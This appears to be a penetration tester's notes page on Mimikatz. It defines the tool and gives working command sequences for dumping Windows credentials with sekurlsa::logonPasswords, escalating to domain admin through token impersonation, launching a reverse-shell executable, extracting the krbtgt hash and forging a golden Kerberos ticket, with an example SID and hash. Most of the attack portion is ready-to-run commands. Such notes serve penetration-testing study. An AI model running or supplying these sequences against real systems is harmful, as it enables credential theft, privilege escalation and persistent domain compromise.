<aside> 📌 Summary

</aside>

Mimikatz

Definition

Mimikatz is a potent post-exploitation tool used by attackers to extract credentials, including plaintext passwords and Kerberos tickets, from Windows systems' memory. It capitalizes on vulnerabilities like Pass-the-Hash, Pass-the-Ticket, and Overpass-the-Hash, granting unauthorized access. Attackers run Mimikatz after compromising a system to escalate privileges, move laterally, and access sensitive data.

Proof of concept

Credential Dumping

When utilising mimikatz.exe import all the necessary dll. Then in the interface, run first privilege::debug to set up the dumping rights.

• sekurlsa::

  

  • sekurlsa::logonPasswords : we can find some hash to crack in it but also some clear text password

    

Token impersonation with Mimikatz

Using Mimikatz we’ll take a look a the token module.

First, we need to check privileges with privilege::debug.

Then we can start listing available tokens:

token::list

Among them we found some domain administrators

Then we can elevate privileges with the following:

token::elevate /domainadmin
token::run /process:"C:\\someReverseShell.exe"

Golden Ticket with Mimikatz

Once we loaded Mimikatz, we check privileges with privilege::debug. Then we can look at the domain’s SID and the krbtgt hash with

lsadump::lsa /inject /name:krbtgt

Then we can use another module named kerberos

kerberos::golden /User:Administrator /domain:ORB.local /sid:<SID> /krbtgt:<Hash> /id:500 /ptt

kerberos::golden /User:Administrator /domain:ORB.local /sid:S-1-5-21-1854181339-1499107752-1584228225 /krbtgt:bd4fa474174f84467b4b05dd3ec0bcf1 /id:500 /ptt

• /User no need to use a real user, any string will work
• /id is the Rid
• /ptt for pass the ticket to the next session

Then (when on an RDP session), you can run the following command to get a session with a golden ticket

misc::cmd